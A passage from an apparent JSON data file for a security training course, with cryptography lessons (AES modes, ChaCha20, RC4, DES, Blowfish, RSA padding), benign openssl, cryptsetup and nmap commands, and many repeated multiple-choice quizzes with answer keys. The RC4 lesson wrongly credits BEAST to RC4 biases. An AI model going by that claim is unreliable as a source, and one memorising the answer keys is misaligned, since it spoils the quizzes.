balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cr-aes-ctr","cat":"Cryptography","title":"AES-CTR Mode","diff":2,"xp":150,"intro":"Counter mode turns a block cipher into a stream cipher.","sections":[{"type":"text","content":"Counter mode turns a block cipher into a stream cipher."},{"type":"code","lang":"bash","content":"# CTR encrypts counter values, XORs with plaintext\n# Parallelizable, no padding needed\nopenssl enc -aes-256-ctr -in plaintext -out cipher -K hex_key -iv hex_iv"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"AES-CTR is parallelizable because...","opts":["It chains blocks","Each block is encrypted independently with a unique counter","It uses ECB","It doesn't use an IV"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-aes-xts","cat":"Cryptography","title":"AES-XTS for Disk Encryption","diff":3,"xp":200,"intro":"XTS mode designed for sector-based encryption.","sections":[{"type":"text","content":"XTS mode designed for sector-based encryption."},{"type":"code","lang":"bash","content":"# Used by: BitLocker, LUKS, FileVault\n# Each sector has a unique tweak value\ncryptsetup luksFormat /dev/sda1\ncryptsetup open /dev/sda1 encrypted"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"AES-XTS is used for...","opts":["Network encryption","Full disk encryption (BitLocker, LUKS)","Email","DNS"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-chacha20","cat":"Cryptography","title":"ChaCha20-Poly1305","diff":2,"xp":150,"intro":"Modern stream cipher + MAC \u2014 TLS 1.3 and WireGuard.","sections":[{"type":"text","content":"Modern stream cipher + MAC \u2014 TLS 1.3 and WireGuard."},{"type":"code","lang":"bash","content":"# ChaCha20 for encryption, Poly1305 for authentication\n# Faster than AES on devices without AES-NI\n# Used in: TLS 1.3, WireGuard, Signal"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"ChaCha20 is preferred on mobile because...","opts":["It's simpler","It's fast without hardware AES acceleration","It uses less memory","It's newer"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-rc4","cat":"Cryptography","title":"RC4 Weaknesses","diff":2,"xp":150,"intro":"Why RC4 is broken and banned from TLS.","sections":[{"type":"text","content":"Why RC4 is broken and banned from TLS."},{"type":"code","lang":"bash","content":"# RC4 key scheduling has biases in early keystream bytes\n# BEAST, NOMORE attacks exploit these biases\n# Banned in TLS since RFC 7465 (2015)\nnmap --script ssl-enum-ciphers target | grep RC4"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"RC4 is broken because...","opts":["It's slow","Its keystream has statistical biases","It's too long","It uses too much memory"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-des-triple","cat":"Cryptography","title":"DES and Triple DES","diff":1,"xp":75,"intro":"56-bit DES is broken. 3DES is slow but still used.","sections":[{"type":"text","content":"56-bit DES is broken. 3DES is slow but still used."},{"type":"code","lang":"bash","content":"# DES: 56-bit key, cracked in hours\n# 3DES: apply DES three times with 2-3 keys\n# Still in payment systems (EMV cards)\nopenssl enc -des-ede3-cbc -in file -out encrypted"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"DES has a key length of...","opts":["128 bits","56 bits","256 bits","64 bits"],"ans":1},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-blowfish","cat":"Cryptography","title":"Blowfish and Twofish","diff":2,"xp":150,"intro":"Blowfish: fast, variable key. Twofish: AES finalist.","sections":[{"type":"text","content":"Blowfish: fast, variable key. Twofish: AES finalist."},{"type":"code","lang":"bash","content":"# Blowfish: 32-448 bit keys, 64-bit blocks\n# Used in bcrypt password hashing\n# Twofish: 128-bit blocks, AES finalist (lost to Rijndael)\nopenssl enc -bf-cbc -in file -out encrypted"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Blowfish is notable for being used in...","opts":["TLS","bcrypt password hashing","Disk encryption","DNS"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-rsa-padding","cat":"Cryptography","title":"RSA Padding Schemes","diff":3,"xp":200,"intro":"PKCS#1 v1.5 vs OAEP \u2014 why padding matters for RSA security.","sections":[{"type":"text","content":"PKCS#1 v1.5 vs OAEP \u2014 why padding matters for RSA security."},{"type":"code","lang":"bash","content":"# PKCS#1 v1.5: vulnerable to Bleichenbacher's attack\n# OAEP (Optimal Asymmetric Encryption Padding): secure\nopenssl rsautl -encrypt -oaep -pubin -inkey pub.pem -in plaintext -out cipher"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"RSA-OAEP is preferred because...","opts":["It's faster","It prevents Bleichenbacher padding oracle attacks","It uses shorter keys","It's simpler"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected 